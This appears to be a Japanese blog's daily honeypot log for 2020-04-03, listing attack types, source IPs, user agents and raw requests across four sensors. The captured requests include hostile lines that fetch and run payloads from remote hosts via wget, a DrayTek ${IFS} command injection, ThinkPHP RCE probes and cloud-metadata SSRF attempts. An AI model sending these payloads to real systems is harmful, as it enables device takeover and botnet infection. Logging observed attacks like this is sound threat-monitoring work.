コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2020/04/03 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2020/04/03分です。

特徴
Location:JP

DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
polaris botnetによるスキャン行為
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
5[.]188[.]210[.]101に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  194.15.36.96/jaws;
sh /tmp/jaws
Location:US

DrayTek製品の脆弱性を狙うアクセス
Huaweiルータの脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  194.15.36.96/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget  194.15.36.96/jaws;
sh /tmp/jawscd /tmp;
rm -rf .j;
wget http:/\\/91.92.66.124/..j/.j;
chmod 777 .j;
sh .j;
echo DONE
Location:UK

GPONルータの脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
polaris botnetによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
110[.]249[.]212[.]46に関する不正通信
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  194.15.36.96/jaws;
sh /tmp
Location:SG

DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
5[.]188[.]210[.]101に関する不正通信
を確認しました。

アクセス数推移

JP:総アクセス数:68 (前日比:-34)
US:総アクセス数:122 (前日比:+85)
UK:総アクセス数:23 (前日比:-24)
SG:総アクセス数:130 (前日比:-7)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
2 5.101.0.209 Russia
1 5.188.210.101 Russia
1 18.224.53.194 United States
1 23.225.172.10 United States
1 23.236.224.146 Canada
1 31.167.173.206 Saudi Arabia
17 44.224.22.196 United States
17 44.225.84.206 United States
3 51.158.118.213 France
2 80.82.65.234 Netherlands
1 83.97.20.196 Romania
1 92.63.194.15 Russia
2 103.55.91.146 India
1 103.59.209.213 India
1 122.115.55.29 China
9 129.204.188.101 China
1 162.243.132.176 United States
1 170.247.152.13 Panama
1 176.58.172.241 Greece
1 190.128.154.222 Paraguay
1 199.195.220.106 Jamaica
1 218.253.8.192 Hong Kong
1 222.84.232.152 China

UserAgent一覧

件数 UserAgent
1 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15'
25 -
14 AWS Security Scanner
6 Go-http-client/1.1
1 Hello, World
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 zgrab/0.x
1 User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705
3 XTC
2 XTC BOTNET
1 curl/7.58.0
1 polaris botnet

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
10 \x16\x03\x01
10 CONNECT 18[.]179[.]20[.]5:80 HTTP/1.0
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
2 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /imgs/ms_check_license HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
4 GET /latest/dynamic/instance-identity/document HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 194.15.36.96/jaws;sh+/tmp/jaws
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /v2/_catalog HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET http://[::ffff:a9fe:a9fe]/ HTTP/1.1
2 GET http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document HTTP/1.1
2 GET http[:]//169[.]254[.]169[.]254/ HTTP/1.1
2 GET http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]101/echo.php HTTP/1.1
2 GET http[:]//example[.]com/ HTTP/1.1
1 GET http[:]//icanhazip[.]com/ HTTP/1.1\n
1 HEAD / HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /boaform/admin/formPing HTTP/1.1
7 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//192[.]3[.]45[.]185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
6 5.101.0.209 Russia
1 23.225.172.10 United States
1 60.237.99.133 Japan
1 62.1.196.202 Greece
2 80.82.65.234 Netherlands
1 82.64.216.10 France
101 95.124.255.102 Spain
1 96.56.5.62 United States
1 96.85.183.21 United States
1 123.253.37.44 Bangladesh
2 164.132.92.162 France
1 185.220.100.255 Germany
1 192.241.238.109 United States
1 192.241.239.219 United States
1 200.7.124.237 Brazil

UserAgent一覧

件数 UserAgent
4 -
3 Go-http-client/1.1
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
2 Mozilla/5.0 zgrab/0.x
1 XTC
2 XTC BOTNET
1 polaris botnet

リクエスト内容一覧

件数 Method Request Protocol
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 194.15.36.96/jaws;sh+/tmp/jaws
1 GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /boaform/admin/formPing HTTP/1.1
5 POST /cgi-bin/mainfunction.cgi HTTP/1.1
2 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//192[.]3[.]45[.]185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1
1 POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
2 5.101.0.209 Russia
1 27.116.38.166 Australia
1 61.219.11.153 Taiwan
2 80.82.65.234 Netherlands
1 92.63.194.15 Russia
1 96.250.176.142 United States
1 100.12.52.185 United States
1 109.233.18.202 Lebanon
5 110.249.212.46 China
2 156.198.16.173 Egypt
1 162.212.113.225 Canada
1 162.243.132.30 United States
1 185.53.88.38 Netherlands
1 190.202.20.211 Venezuela
1 192.241.237.102 United States
1 202.72.240.12 Mongolia

UserAgent一覧

件数 UserAgent
11 -
2 Go-http-client/1.1
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 zgrab/0.x
1 XTC
3 XTC BOTNET
2 polaris botnet

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x03
1 GET /ReportServer HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+ 194.15.36.96/jaws;sh+/tmp/jaws
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
5 GET http[:]//110[.]249[.]212[.]46/testget?q=23333&port=80 HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 POST /HNAP1/ HTTP/1.0
2 POST /boaform/admin/formPing HTTP/1.1
6 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.210.101 Russia
1 23.225.172.10 United States
113 59.127.230.217 Taiwan
1 61.219.11.153 Taiwan
3 80.82.65.234 Netherlands
1 80.82.70.118 Netherlands
2 85.204.246.193 Romania
1 104.201.114.62 United States
1 162.243.130.107 United States
1 162.243.132.251 United States
1 164.132.92.162 France
1 184.68.253.202 Canada
1 185.235.132.10 Ukraine
1 187.142.63.98 Mexico
1 200.4.164.178 Haiti

UserAgent一覧

件数 UserAgent
5 -
4 Go-http-client/1.1
113 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 Mozilla/5.0 zgrab/0.x
2 XTC BOTNET
1 polaris botnet
2 python-requests/2.22.0

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 \x16\x03\x02\x01o\x01
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.svn/all-wcprops HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /PMA2011/index.php?lang=en HTTP/1.1
1 GET /PMA2012/index.php?lang=en HTTP/1.1
1 GET /PMA2013/index.php?lang=en HTTP/1.1
1 GET /PMA2014/index.php?lang=en HTTP/1.1
1 GET /PMA2015/index.php?lang=en HTTP/1.1
1 GET /PMA2016/index.php?lang=en HTTP/1.1
1 GET /PMA2017/index.php?lang=en HTTP/1.1
1 GET /PMA2018/index.php?lang=en HTTP/1.1
1 GET /PMA2019/index.php?lang=en HTTP/1.1
1 GET /PMA2020/index.php?lang=en HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/pMA/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
1 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
1 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?lang=en HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
1 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /pma2011/index.php?lang=en HTTP/1.1
1 GET /pma2012/index.php?lang=en HTTP/1.1
1 GET /pma2013/index.php?lang=en HTTP/1.1
1 GET /pma2014/index.php?lang=en HTTP/1.1
1 GET /pma2015/index.php?lang=en HTTP/1.1
1 GET /pma2016/index.php?lang=en HTTP/1.1
1 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2018/index.php?lang=en HTTP/1.1
1 GET /pma2019/index.php?lang=en HTTP/1.1
1 GET /pma2020/index.php?lang=en HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /sql/myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
1 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]101/echo.php HTTP/1.1
1 POST /boaform/admin/formPing HTTP/1.1
5 POST /cgi-bin/mainfunction.cgi HTTP/1.1
2 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//192[.]3[.]45[.]185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1